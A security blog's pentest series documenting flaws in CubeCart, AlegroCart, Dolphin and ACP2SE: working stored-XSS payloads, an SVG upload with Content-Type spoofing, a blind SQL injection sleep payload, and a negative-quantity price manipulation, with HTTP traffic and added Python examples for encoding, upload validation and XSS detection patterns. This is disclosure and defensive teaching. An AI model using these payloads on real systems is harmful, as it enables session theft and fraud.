Saturday, 24 May 2025

Friday Fun Pentest Series - 25 - Stored Cross Site Scripting (XSS) - cubecartv6.5.9

Description

- It was noted that the application was vulnerable to Stored Cross Site Scripting


Stored Cross Site Scripting #1:

Steps to Reproduce:

  1. Visit "Account" > "Address Book" and choose "Edit"
  2. In the "Description" parameter enter the following payload <iframe><textarea></iframe><img src="" onerror="alert(document.domain)">

// HTTP POST Request

POST /cubecart/index.php?_a=addressbook&action=edit&address_id=1 HTTP/1.1
Host: 192.168.58.186
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
[...]

------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6
Content-Disposition: form-data; name="description"

<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">
------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6
Content-Disposition: form-data; name="title"
[...] 


// HTTP Response

HTTP/1.1 302 Found
Date: Sun, 18 May 2025 12:16:17 GMT
Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12 Perl/v5.34.1
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.2.4
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]


// HTTP GET Request

GET /cubecart/index.php?_a=addressbook HTTP/1.1
Host: 192.168.58.186
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
[...]



// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 18 May 2025 12:16:41 GMT
Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12 Perl/v5.34.1
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.2.4
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: CC_1349B74620=k6fd07i7h211fg1d69p5mvkuru;Expires=Monday, 19-May-2025 12:16:41 UTC;Domain=.192.168.58.186;Path=/cubecart;HttpOnly
Vary: Accept-Encoding
Content-Length: 42139
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[...]
<div class="small-12 columns"><h5><a href="?_a=addressbook&action=edit&address_id=1"><iframe><textarea></iframe><img src="" onerror="alert(document.domain)"></a></h5></div>
[...]
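The fix for this finding is output encoding at the point where the stored description is written into the page. The following is an added example in Python (not CubeCart's own code, which is PHP) that mirrors the markup of the 200 response above with a hypothetical template and shows the difference between interpolating the stored value verbatim and entity-encoding it for the text context it lands in:

```python
import html

# Constructed sample: the value submitted in the "description" field of the request above.
STORED_DESCRIPTION = '<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">'

# Hypothetical template for the address-book row; mirrors the markup in the 200 response above.
ROW_TEMPLATE = (
    '<div class="small-12 columns"><h5>'
    '<a href="?_a=addressbook&amp;action=edit&amp;address_id={id}">{desc}</a>'
    '</h5></div>'
)


def render_vulnerable(address_id: int, description: str) -> str:
    """Interpolates the stored value verbatim, which is what the finding shows:
    the browser parses the description as markup and runs the onerror handler."""
    return ROW_TEMPLATE.format(id=int(address_id), desc=description)


def render_encoded(address_id: int, description: str) -> str:
    """Same template, but the stored value is entity-encoded for the text-node
    context it lands in. html.escape(quote=True) rewrites & < > " and ', so the
    value can no longer open a tag or break out of an attribute."""
    return ROW_TEMPLATE.format(id=int(address_id), desc=html.escape(description, quote=True))


def foreign_tag_openers(rendered: str) -> int:
    """Number of '<' characters in the rendered row beyond those in the fixed
    template, i.e. how many tags the stored value was able to contribute."""
    return rendered.count("<") - ROW_TEMPLATE.format(id=0, desc="").count("<")


if __name__ == "__main__":
    print("unencoded:", foreign_tag_openers(render_vulnerable(1, STORED_DESCRIPTION)), "extra tag openers")
    print("encoded:  ", foreign_tag_openers(render_encoded(1, STORED_DESCRIPTION)), "extra tag openers")
    print(render_encoded(1, STORED_DESCRIPTION))
```

The encoded row reads the same to a human, but every `<` and `"` from the stored value arrives as an entity, so the browser creates no extra elements and runs no handler. Encoding is context-specific: this covers a text node (and, with quote=True, attribute values); a value placed inside a URL or a script block needs the encoder for that context.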

Wednesday, 30 April 2025

Friday Fun Pentest Series - 24 - Business Logic Flaw: Price Manipulation - alegrocartv1.2.9

Description

- The "quantity" parameter was vulnerable to a business logic flaw that affected the final price


Business Logic Flaw: Price Manipulation #1:

Steps to Reproduce:

  1. Visit the store and add a product
  2. Intercept the HTTP GET request and add a negative value to the "quantity" parameter

// HTTP GET request

GET /alegrocart/index.php?controller=addtocart&action=add&item=10&quantity=-100 HTTP/1.1
Host: 192.168.58.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
[...]


// HTTP response

HTTP/1.1 200 OK
Date: Thu, 03 Apr 2025 22:16:58 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Cache-Control: max-age=0, private, no-store, no-cache, must-revalidate
Expires: Thu, 03 Apr 2025 22:16:58 GMT
Vary: Accept-Encoding
Content-Length: 813
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div class="headingcolumn pointer" onclick="ShowCart()"><h3>Cart  ^</h3></div>
<div  class="cart">
<div id="cart_content" class="cart_content">
<div id="cart_products">
<table>
<tr>
<td>-100&nbsp;x&nbsp;</td>
<td class="ff"><a href="http://192.168.58.129/alegrocart/?controller=product&amp;product_id=10">Featured13/8&quot;&amp;1/2&quot;</a></td>
<td class="ee"> $-1,599.00</td>
</tr>
</table>
</div>
<div class="aa">Subtotal:$-1,599.00</div>
<div class="cc">1 Product(s) - <div class="dd">-100 Item(s)</div></div>
<div class="bb" id="cart_button"><a href="http://192.168.58.129/alegrocart/?controller=cart">View Cart</a></div>
[...]



Friday Fun Pentest Series - 23 - Stored XSS - alegrocartv1.2.9

Description

- The application lacked output encoding and, as a result, was vulnerable to Stored XSS


Stored XSS #1:

Steps to Reproduce:

  1. Log in with the demonstrator account and visit "Customers" > "Newsletter"
  2. In "Message" use the following XSS payload

<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>

Friday Fun Pentest Series - 22 - XSS via SVG Image Upload - alegrocartv1.2.9

Description

- It was noted that the image upload functionality was vulnerable to XSS by uploading a specially crafted SVG image


XSS via SVG Image Upload

Steps to Reproduce:

  1. Visit http://192.168.58.129/alegrocart/administrator/?controller=download
  2. Upload SVG image file with the contents below
  3. Intercept the POST request and change the Content-Type to "Content-Type: image/jpg"
  4. Then visit "http://192.168.58.129/alegrocart/download/xss.svg" to trigger the XSS

<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
    <foreignObject width="100%" height="100%">
        <body xmlns="http://www.w3.org/1999/xhtml">
            <input type="text" onkeyup="prompt('XSS Triggered!')" placeholder="Type here..."/>
        </body>
    </foreignObject>
</svg>
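Added example in Python, not AlegroCart's own upload code: validation that looks at the bytes of the upload instead of the client-supplied Content-Type, rejects the mismatch introduced in step 3, and, for SVG, refuses files that carry foreignObject, script or event-handler attributes. A constructed copy of the SVG above is embedded as sample input; the format list and policy are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Constructed copy of the SVG from the steps above.
UPLOADED_SVG = b"""<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
    <foreignObject width="100%" height="100%">
        <body xmlns="http://www.w3.org/1999/xhtml">
            <input type="text" onkeyup="prompt('XSS Triggered!')" placeholder="Type here..."/>
        </body>
    </foreignObject>
</svg>"""

# File signatures for the raster formats an image upload normally accepts.
MAGIC = [(b"\xff\xd8\xff", "jpeg"), (b"\x89PNG\r\n\x1a\n", "png"), (b"GIF87a", "gif"), (b"GIF89a", "gif")]
# SVG has no binary signature: it is XML whose root element is <svg>.
SVG_START = re.compile(rb"\s*(?:<\?xml[^>]*>\s*)?(?:<!--.*?-->\s*)*(?:<!DOCTYPE[^>]*>\s*)?<svg\b", re.S | re.I)
# What each declared Content-Type is allowed to contain (image/jpg is a common non-standard alias).
DECLARED_KIND = {"image/jpeg": "jpeg", "image/jpg": "jpeg", "image/png": "png",
                 "image/gif": "gif", "image/svg+xml": "svg"}
# SVG constructs that can run script when the file is rendered as a document.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "object", "embed"}


def sniff_image(data: bytes) -> str:
    """Identify the format from the bytes, ignoring whatever the client declared."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    if SVG_START.match(data.lstrip(b"\xef\xbb\xbf")):
        return "svg"
    return "unknown"


def svg_active_content(data: bytes) -> list[str]:
    """List every reason the SVG could execute script if served as image/svg+xml."""
    try:
        root = ET.fromstring(data)  # for untrusted XML in production, parse with defusedxml
    except ET.ParseError as exc:
        return [f"malformed XML ({exc})"]
    issues = []
    for el in root.iter():
        name = el.tag.rsplit("}", 1)[-1]  # strip the namespace prefix
        if name in ACTIVE_ELEMENTS:
            issues.append(f"<{name}> element")
        for attr, value in el.attrib.items():
            local = attr.rsplit("}", 1)[-1]
            if local.lower().startswith("on"):
                issues.append(f"{local} handler on <{name}>")
            elif local == "href" and value.strip().lower().startswith("javascript:"):
                issues.append(f"javascript: URL on <{name}>")
    return issues


def validate_upload(declared_content_type: str, data: bytes) -> tuple[bool, str]:
    """Accept only uploads whose bytes match the declared type and carry no active content."""
    kind = sniff_image(data)
    if kind == "unknown":
        return False, "content is not a supported image format"
    declared = declared_content_type.split(";")[0].strip().lower()
    if DECLARED_KIND.get(declared) != kind:
        return False, f"declared {declared!r} but content is {kind}"
    if kind == "svg":
        issues = svg_active_content(data)
        if issues:
            return False, "SVG with active content: " + "; ".join(issues)
    return True, kind


if __name__ == "__main__":
    print(validate_upload("image/jpg", UPLOADED_SVG))
    print(validate_upload("image/svg+xml", UPLOADED_SVG))
    print(validate_upload("image/svg+xml", b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1"/></svg>'))
```

Even an SVG that passes this check should not be served from the application's origin as a document; sending it with Content-Disposition: attachment or behind a restrictive Content-Security-Policy (or rasterising it on upload) removes the remaining risk.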


Friday, 21 March 2025

Friday Fun Pentest Series - 21 - SQL Injection in Admin Functionality - dolphin.prov7.4.2

Description

- It was noted that the admin functionality was vulnerable to Blind SQL injection


SQL Injection in Admin Functionality

Steps to Reproduce:

  1. Log in as the admin user and visit "http://192.168.58.170/dolphinCMS/administration/index.php?cat="
  2. Add the MySQL SLEEP() injection payload below to the "cat" value
  3. Notice that the backend delays the HTTP response by 14 milliseconds

%27%20and%20(select*from(select(sleep(14)))a)--%20


// HTTP GET Request

GET /dolphinCMS/administration/index.php?cat=%27%20and%20(select*from(select(sleep(14)))a)--%20 HTTP/1.1
Host: 192.168.58.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Thu, 20 Mar 2025 22:55:46 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 55510



Friday Fun Pentest Series - 20 - Stored XSS in Messaging Functionality - dolphin.prov7.4.2

Description

- It was identified that the "Send Message" functionality was vulnerable to Stored Cross-Site Scripting, opening the door to account takeover and more advanced attack scenarios


Stored XSS in Messaging Functionality

Steps to Reproduce:

  1. Login and visit "http://192.168.58.170/dolphinCMS/mail.php?mode=compose"
  2. Add "Recipient" and "Subject" with random words
  3. Add the XSS payload shown below, which bypasses the XSS filter, in the message section
  4. Intercept the HTTP POST request and add the payload once again, as it may have been filtered (make sure to URL-encode spaces and similar characters)
  5. The payload triggers once the message is viewed

<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>


// HTTP POST request

POST /dolphinCMS/mail.php?ajax_mode=true&action=compose_mail&recipient_id=1 HTTP/1.1
Host: 192.168.58.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
[...]

subject=test&message=<iframe+srcdoc%3d"<img+src%3dx+onerror%3dalert(document.domain)>"></iframe>


// HTTP Response

HTTP/1.1 200 OK
Date: Fri, 21 Mar 2025 17:41:52 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 455
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<div class="MsgBox" id="1742578912167">
<table class="MsgBox bx-def-margin-top bx-def-margin-bottom"><tr><td>
<div class="msgbox_content bx-def-font-large bx-def-padding-sec">
Message has been successfully sent. <a href="http://192.168.58.170/dolphinCMS/mail.php?mode=compose">Send</a> another message or <a href="http://192.168.58.170/dolphinCMS/admin">view</a> admin's profile.        </div>
</td></tr></table>
</div>

Wednesday, 19 February 2025

Friday Fun Pentest Series - 19 - Self Stored XSS - acp2sev7.2.2

Description

- It was found that the application did not sanitize input or encode output correctly, leading to Self Stored XSS.


Self Stored XSS #1

Steps to Reproduce:

  1. Visit "http://192.168.58.168/acp2se/mul/muladmin.php" and log in with "admin" / "adminpass"
  2. In the field "Put the name of the new Admin" enter the following payload "><svg onload=prompt(document.cookie)>

// HTTP POST request

POST /acp2se/mul/muladmin.php HTTP/1.1
Host: 192.168.58.168
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
[...]

name="><svg onload=prompt(document.cookie)>&submit=Submit


// HTTP Response

HTTP/1.1 200 OK
Date: Wed, 19 Feb 2025 08:22:26 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1210
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[...]
<table border='1' cellpadding='2' cellspacing='2' width='850'>
<tr bgcolor='#C0C0C0'>
 <th width='850'>You have added a default Admin. His name is: "><svg onload=prompt(document.cookie)> .</br> The default password will be: <b>Admin</b>
[...]
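The five XSS findings on this page all arrive as ordinary form submissions, which makes them detectable at the request layer before any application code runs. As an added Python example (not from any of the projects above), this scans x-www-form-urlencoded and multipart bodies, peels off repeated URL encoding and HTML entities first, and reports which parameter carried tag, event-handler, srcdoc or javascript: markers. The request bodies are constructed copies of the ones quoted in findings 25, 20 and 19; the marker list is an assumption to be tuned against real traffic.

```python
import html
import re
from urllib.parse import parse_qsl, unquote_plus

# Markers for HTML/JS injection attempts. Event handlers and srcdoc are only
# flagged inside a tag, which keeps ordinary text such as "online=yes" out of the results.
XSS_MARKERS = [
    ("tag", re.compile(r"<\s*/?\s*(?:svg|img|iframe|script|textarea|object|embed|body)\b", re.I)),
    ("event-handler", re.compile(r"<[^>]*\bon[a-z]+\s*=", re.I)),
    ("srcdoc", re.compile(r"<[^>]*\bsrcdoc\s*=", re.I)),
    ("js-uri", re.compile(r"javascript\s*:", re.I)),
]


def normalise(value: str, rounds: int = 3) -> str:
    """Peel off the encodings an evasive request may stack: repeated URL encoding
    and HTML entities. Stops early once a pass changes nothing."""
    for _ in range(rounds):
        decoded = html.unescape(unquote_plus(value))
        if decoded == value:
            break
        value = decoded
    return value


def scan_fields(fields: list[tuple[str, str]]) -> list[dict]:
    """Run the markers over every (name, value) pair; one finding per suspicious field."""
    findings = []
    for name, raw in fields:
        value = normalise(raw)
        hits = [label for label, rx in XSS_MARKERS if rx.search(value)]
        if hits:
            findings.append({"param": name, "markers": hits, "decoded": value})
    return findings


def scan_urlencoded(body: str) -> list[dict]:
    """application/x-www-form-urlencoded bodies and query strings."""
    return scan_fields(parse_qsl(body, keep_blank_values=True))


def parse_multipart(body: str, boundary: str) -> list[tuple[str, str]]:
    """Minimal multipart/form-data splitter (text fields only, CRLF line endings)."""
    fields = []
    for part in body.split("--" + boundary):
        part = part.strip("\r\n")
        if not part or part == "--":
            continue  # preamble, or the epilogue after the closing delimiter
        headers, _, value = part.partition("\r\n\r\n")
        m = re.search(r';\s*name="([^"]*)"', headers)
        if m:
            fields.append((m.group(1), value))
    return fields


def scan_multipart(body: str, boundary: str) -> list[dict]:
    return scan_fields(parse_multipart(body, boundary))


# Constructed samples, reproducing the request bodies quoted in the findings above
# (the "title" value is invented; the original shows "[...]").
ACP2SE_BODY = 'name="><svg onload=prompt(document.cookie)>&submit=Submit'
DOLPHIN_BODY = 'subject=test&message=<iframe+srcdoc%3d"<img+src%3dx+onerror%3dalert(document.domain)>"></iframe>'
BOUNDARY = "----geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6"
CUBECART_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="description"\r\n\r\n'
    '<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="title"\r\n\r\n'
    "Home\r\n"
    f"--{BOUNDARY}--\r\n"
)
BENIGN_BODY = "name=Alice&submit=Submit"

if __name__ == "__main__":
    for label, result in [("acp2se", scan_urlencoded(ACP2SE_BODY)),
                          ("dolphin", scan_urlencoded(DOLPHIN_BODY)),
                          ("cubecart", scan_multipart(CUBECART_BODY, BOUNDARY)),
                          ("benign", scan_urlencoded(BENIGN_BODY))]:
        print(label, result)
```

Decoding before matching is what makes the Dolphin body detectable: the raw request only contains `%3d` where the markers expect `=`, which is the same reason step 4 of finding 20 asks for URL-encoding. This is a triage signal, not a control; the fix remains output encoding or allowlist sanitization in the application.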
